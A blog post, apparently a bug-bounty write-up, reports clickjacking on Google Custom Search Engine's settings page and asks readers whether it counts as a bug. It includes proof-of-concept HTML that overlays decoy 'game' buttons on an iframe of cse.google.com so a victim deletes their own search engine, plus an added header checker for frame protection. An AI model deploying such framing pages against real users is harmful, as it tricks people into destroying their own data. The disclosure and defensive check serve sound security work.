I Found Clickjacking on Google CSE. Is This Important?

While I was testing, I found that cse.google.com is vulnerable to clickjacking, so I checked whether the settings page was vulnerable too, and it was. That makes this a real risk: an attacker could delete someone's CSE.

Summary: An attacker can delete a victim's CSE.

Steps to reproduce:

  1. Go to https://cse.google.com/
  2. The page can be embedded into any webpage.
  3. The attacker can craft an HTML template so that the victim ends up deleting their own CSE.

I wrote a proof-of-concept page for the clickjacking; here is the code:

<div style="position: absolute; left: 100px; top: 10px;"><h3>Let's consider this is a game!</h3></div>
<div style="position: absolute; left: 100px; top: 40px;"><h3>To finish it, you have to press the keys in sequence.</h3></div>
<div style="position: absolute; left: 205px; top: 278px; color: red;"><button>1</button></div>
<div style="position: absolute; left: 300px; top: 178px; color: red;"><button>2</button></div>
<div style="position: absolute; left: 400px; top: 475px; color: red;"><button>3</button></div>
<iframe style="opacity: 1; border: 0; position: fixed; top: 0px; left: 0px;" src="https://cse.google.com/" width="100%" height="100%"></iframe>

Using the clickjacking technique, an attacker can make someone delete their CSE without realising it.
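The precondition for the attack above is simply that the browser is allowed to frame the page: no X-Frame-Options header and no Content-Security-Policy frame-ancestors directive. The following checker, an added example that is not part of the original post, takes a response's headers (lower-cased names, as a Node or fetch client returns them; the sample header sets are constructed) and reports whether the page is frameable and why.

```javascript
// Added example: decide whether response headers allow cross-origin framing,
// the precondition for clickjacking. Header names are assumed lower-case.

function parseFrameAncestors(csp) {
  // Returns the frame-ancestors source list, or null if the directive is absent.
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map(t => t.replace(/^'|'$/g, '').toLowerCase());
    }
  }
  return null;
}

function assessFrameProtection(headers) {
  const sources = parseFrameAncestors(headers['content-security-policy']);
  if (sources !== null) {
    // When frame-ancestors is present, browsers ignore X-Frame-Options entirely.
    if (sources.length === 0 || sources.includes('none')) {
      return { frameable: false, reason: "CSP frame-ancestors 'none'" };
    }
    if (sources.includes('*')) {
      return { frameable: true, reason: 'CSP frame-ancestors allows any origin (*)' };
    }
    return { frameable: false, reason: `CSP frame-ancestors limited to: ${sources.join(' ')}` };
  }
  const xfo = (headers['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    return { frameable: false, reason: `X-Frame-Options ${xfo}` };
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // ALLOW-FROM is obsolete; current browsers ignore it, so the page stays frameable.
    return { frameable: true, reason: 'X-Frame-Options ALLOW-FROM is ignored by modern browsers' };
  }
  return { frameable: true, reason: 'no X-Frame-Options and no frame-ancestors directive' };
}

// Constructed sample responses; "unprotected" mirrors the situation in the finding.
const SAMPLE_RESPONSES = {
  unprotected: { 'content-type': 'text/html; charset=utf-8' },
  cspOnly: { 'content-security-policy': "default-src 'self'; frame-ancestors 'none'" },
  xfoOnly: { 'x-frame-options': 'SAMEORIGIN' },
  cspOverridesXfo: { 'x-frame-options': 'DENY', 'content-security-policy': 'frame-ancestors *' },
};

for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
  const result = assessFrameProtection(headers);
  console.log(`${name}: frameable=${result.frameable} (${result.reason})`);
}
```

The last sample shows why a defender should check both headers together: a permissive frame-ancestors directive silently overrides a strict X-Frame-Options.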

For how an attacker can make someone delete their CSE without noticing, you can check my video PoC here:

Enough about the explanation.

Okay, now the problem begins. In my opinion, the finding above is a valid bug. Why? Because the attacker can delete someone's data (their CSE); isn't that a bug? But the response I got was very surprising.

The part that confuses me is: how is this not a bug? In my head it is clear that I can delete other people's data.

What do you think? Is this a bug, or am I the only one who is overestimating it?

This article was already published on dev.to.